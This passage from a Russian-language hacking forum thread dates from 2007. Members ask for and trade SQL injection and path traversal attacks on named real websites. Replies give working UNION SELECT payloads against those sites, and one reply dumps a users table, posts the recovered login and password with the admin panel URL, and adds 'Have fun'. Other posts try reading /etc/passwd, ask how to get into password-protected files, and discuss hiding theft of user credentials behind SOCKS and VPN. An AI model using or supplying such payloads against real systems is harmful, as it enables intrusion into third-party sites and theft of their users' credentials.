Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Вполне согласен со Scipio.
    Возможно сначала идут 2 разных запроса, получают оба результата, и только после всего этого выводят в html.
    И если какойто запрос не выполняется то exit(mysql_error());
    имхо

    Юзал недавно багу на 1 сайте, линк не помню, в общем посмотрел конфигурацию хостера - мускул 4 версии
     
  2. ntldr

    ntldr Elder - Старейшина

    Joined:
    4 Dec 2007
    Messages:
    367
    Likes Received:
    140
    Reputations:
    23
    есть такой запрос
    INSERT INTO `login` (`userid` , `user_pass` , `sex` , `email` , `state` )
    VALUES ('user', '1234', 'M', '[email protected][sql query]', '0');

    собсно, вопрос: можно ли как-нибудь приписать туда свой запрос? у меня получалось добавить только такой же insert
    [email protected]','0'),('asd','asd','M','[email protected]','0');/*
    но, хотелось бы чтонибудь более существенное, или инсерт, но с большим количеством столбцов.

    вроде так
     
    #382 ntldr, 4 Dec 2007
    Last edited: 4 Dec 2007
  3. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Подскажите как можно решить вопрос с информацией по названию каталогов на сайте ?????
    Есть SQL inj: http://kojyhovo.ru/news/news.php?id=-81+union+select+1,concat(login,char(58),password)+from+users/*
    но не могу найти админку может кто подскажет.

    load_file('') не работает!

    Заранее спасибо.
     
  4. LolFEm

    LolFEm Elder - Старейшина

    Joined:
    8 Sep 2006
    Messages:
    160
    Likes Received:
    52
    Reputations:
    5
    Возможно ли тут раскрутить иньекцию?

    http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
     
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Это вобщето инъекция в MSAccess...

    теоретически раскрутить можно:
    Code:
    http://www.rochesterautodealers.com/news.asp?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20admins
    подбирай таблицы, прав на чтение системных таблиц нет

    З.Ы. вобще .Slip в чем то прав, но это так, мысли вслух ни к кому неотносящиеся
     
    #385 Scipio, 5 Dec 2007
    Last edited: 5 Dec 2007
    2 people like this.
  6. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Вот мне интересно, что за дыра
    http://sait.ru/index.php?fuse=admin&view=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd

    В ответ вообще хз, что вылезло.

    An error has occurred with the given operation

    Fuse: admin
    Action:
    Type: User Error (256)
    Description: View .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist
    Script: /var/www/saitdata/www/sait.ru/newedge/classes/NE_Controller.php
    Line Number: 88
    Stack:
    /var/www/sait/data/www/sait.ru/newedge/classes/NE_Controller.php (88) : trigger_error
    /var/www/sait/data/www/sait.ru/newedge/front.php (72) : ne_controller::processview
    /var/www/sait/data/www/sait.ru/index.php (3) : require

    Попробовал по другому.
    http://sait.ru/index.php?fuse=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd
    Вышло следующее
    Module .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist or hasn't been properly installed

    С таким никогда раньше не сталкивался.
     
    #386 Ershik, 7 Dec 2007
    Last edited: 7 Dec 2007
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Дай нормальную урлу - тебе скажут... Так возможный инклуд... Видно, что в скриптах используются свои обработчики ошибок... Что можно сделать - ХЗ. Урлу в студию.
     
  8. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Ссылка удалена
     
    #388 Ershik, 7 Dec 2007
    Last edited: 11 Dec 2007
  9. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    В параметре fuse ничего нет... Всё отфильтровано.
     
  10. KyKypy3HuK

    KyKypy3HuK New Member

    Joined:
    7 Dec 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    - Существует ли способ скачать запороленный файл с ifolder.ru? Естественно, не зная пароля. Может есть какая-нибудь уязвимость?
    - Есть ли уязвимости в гостевой книге "SR + Denied Guestbook v.2.1.5"? В ранних версиях присутствовал баг с файлом passwd.dat, и XSS был, но в этой версии не пашет.
     
    #390 KyKypy3HuK, 9 Dec 2007
    Last edited: 9 Dec 2007
  11. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    http://www.f1links.com/list.php?id=62'
    раскрутите скулю плз. у меня не получилось(
     
  12. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Code:
    http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),1),1)/*
    
     
    1 person likes this.
  13. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Code:
    http://www.f1links.com/list.php?id=-62+union+select+1,convert(count(*)+using+latin1)+from+users
    4=\
    Code:
    http://www.f1links.com/list.php?id=-62+union+select+1,convert(concat(user,0x3a,pass)+using+latin1)+from+users+limit+0,1
    david:bla
    =
    http://www.f1links.com/admin/

    Have fun
     
    2 people like this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    qwerty

    Слип цука =\
     
    3 people like this.
  15. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    Только что нашел sql инъекцию, через которую можно слить мыла и пароли юзеров сайта, это уголовно наказуемо?) И как от этого уберечься? Соксы и VPN ?
     
  16. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    тибя посодют, а ты неворуй!
    да
    да
     
  17. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    А просто запостить в раздел инъекций можно?
    P.S. может кому-нибудь понадобится. :)
     
    #397 Momiji, 10 Dec 2007
    Last edited: 10 Dec 2007
    1 person likes this.
  18. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Не можно, а нужно =)...
    Если ваша уязвимость на сайте понравится участникам форума, то вам за это даже репутацию повысят...
     
  19. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Есть сайт вида
    Code:
    http://www.site.ru/11/15/
    При подстановке одинарной кавычки
    Code:
    http://www.site.ru/11/15'/
    Плюет :
    Code:
    Ошибка
    Внутренняя ошибка
    
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `uid` IN (408' at line 1
    И отсюда у меня 2 вопроса:

    это инъект ?
    если да, то какого вида должен быть запрос?
     
  20. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    попробуй
    http://www.site.ru/11/15+union+select+blablabla+from+hekbla--+/
     
    _________________________
Thread Status:
Not open for further replies.